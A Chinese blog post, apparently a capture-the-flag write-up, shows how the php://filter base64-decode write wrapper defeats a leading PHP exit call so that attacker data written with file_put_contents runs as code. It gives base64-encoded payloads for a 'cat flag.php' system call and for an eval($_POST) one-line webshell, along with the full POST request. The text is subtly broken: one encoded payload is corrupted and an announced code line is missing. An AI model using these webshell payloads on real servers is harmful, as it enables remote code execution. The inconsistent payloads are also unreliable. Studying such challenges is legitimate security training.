php://filter的妙用

时间:2019-01-30
本文章向大家介绍php://filter的妙用,主要包括php://filter的妙用使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

php://filter是PHP语言中特有的协议流,作用是作为一个“中间流”来处理其他流。比如,我们可以用如下一行代码将POST内容转换成base64编码并输出

以下是2018年moctf一道 死亡退出的题

查看源码:<?php exit;?>写在了最前面;说明当代码执行到这里会使代码直接退出,不会执行后续代码。所以我们要绕过这里!
先来分析下后续代码: 先给$c用post方法传递一个参数 此处的@是屏蔽错误提示的意思,后 file_put_contents
是把数据写入文件中。 这里绕过<?php exit ?>可以通过使用协议流的方法使用base64编码,绕过。

既:file=php://filter/write=convert.base64-decode/resource=tmp.php
接下来构造传入的字符串c:
(看了好多博客,发现他们给c传入的值都是<?php system('cat flag.php'); ?>)之所以都传他,是因为 题目说了flag在flag.php里面,所以写马。将<?php system('cat flag.php'); ?>
转化为base64编码如下:
c=aPD9waHAgc3lzdGVtKCdjYXQ1gZmxhZy5waHAnKTsgPz4=

而我自己写的时候,用的是构造了一句话木马,传入。
目前还不清楚为啥都可以,难道是php文本的都可以?
<?php @eval($_POST['c']);?>
转为base64编码传入:

c=aPD9waHAgQGV2YWwoJF9QT1NUWydjJ10pOz8+

因为phpexit一共7个字符,因为base64算法解码时是4个byte一组,所以给他增加1个“a”一共8个字符。这样,"phpexita"被正常解码,而后面我们传入的webshell的base64内容也被正常解码。
所以用post传入数据 :c=aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTsgPz4=&file=php://filter/write=convert.base64-decode/resource=tmp.php
后抓包运行即可!!!!!

参考文本:https://www.leavesongs.com/PENETRATION/php-filter-magic.html#xxe

上一页 下一页

原文地址:http://www.manongjc.com/article/49729.html